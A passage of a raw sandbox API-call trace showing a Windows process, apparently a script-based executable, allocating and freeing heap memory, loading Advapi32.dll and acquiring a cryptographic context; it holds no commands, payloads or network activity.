RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0222.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0222.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0222.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0222.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0222.854] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0222.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0222.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0222.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0222.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.855] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0222.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0222.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0222.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0222.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0222.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0222.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0222.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0222.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0222.856] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0222.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0222.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0222.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0222.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0222.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0222.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0222.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0222.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0222.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0222.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0222.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0222.857] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0222.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0222.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0222.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0222.857] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0222.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0222.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0222.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0222.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0222.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0222.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0222.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.857] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0222.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0222.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0222.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0222.858] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0222.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0222.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.859] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0222.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0222.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0222.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0222.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0222.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.859] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.859] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0222.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.859] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0222.901] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0222.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69be8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0222.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0222.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0222.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0222.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0222.902] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0222.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0222.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0222.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0222.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0222.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0222.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0222.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0222.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0222.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0222.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0222.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0222.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0222.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0222.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0222.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0222.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0222.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0222.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0222.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0222.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0222.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0222.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0222.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0222.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0222.906] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0222.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0222.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0222.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0222.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0222.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0222.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0222.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0222.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0222.907] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0222.907] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0222.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0222.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d28 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 